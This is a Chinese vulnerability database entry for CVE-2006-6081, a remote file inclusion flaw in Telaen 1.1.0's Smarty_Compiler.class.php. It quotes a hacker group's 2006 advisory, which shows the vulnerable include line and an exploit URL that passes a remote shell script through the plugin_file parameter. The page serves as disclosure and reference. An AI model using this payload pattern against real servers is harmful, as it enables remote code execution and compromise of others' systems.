Telaen Smarty_Compiler.class.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192786 漏洞类型 未知
发布时间 2006-11-24 更新时间 2006-11-24
CVE编号 CVE-2006-6081 CNNVD-ID CNNVD-200611-399
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/87330
https://cxsecurity.com/issue/WLB-2006110106
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-399
|漏洞详情
Telaen的Smarty_Compiler.class.php存在PHP远程文件包含漏洞,远程攻击者可借助plugin_file参数中的URL执行任意PHP代码。
|漏洞EXP
"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """ 
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """ 
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
        Xmor$ DigitaL Hacking TeaM

# Telaen  => 1.1.0 Remote File Include Vulnerability
# Script.............. : Telaen
# Discovered by.... : the_Edit0r	
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r 
#      D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )
#  http://www.telaen.org/

Telaen

# CodE : 
  
  include_once $plugin_file

# Expl0it : 
 
  Www.Site.coM/[path]/smarty/Smarty_Compiler.class.php?plugin_file=[shell_
script]

# Contact me : the_3dit0r[at]Yahoo[dot]coM
|受影响的产品
Telaen Telaen 1.1.0
|参考资料

来源:XF
名称:telaen-smartycompiler-file-include(30432)
链接:http://xforce.iss.net/xforce/xfdb/30432
来源:BUGTRAQ
名称:20061119Telaen=>1.1.0RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/452139/100/0/threaded
来源:BUGTRAQ
名称:20061119Telaen<=1.1.0RemoteFileIncludeExploit
链接:http://www.securityfocus.com/archive/1/archive/1/452086/100/100/threaded
来源:SREASON
名称:1904
链接:http://securityreason.com/securityalert/1904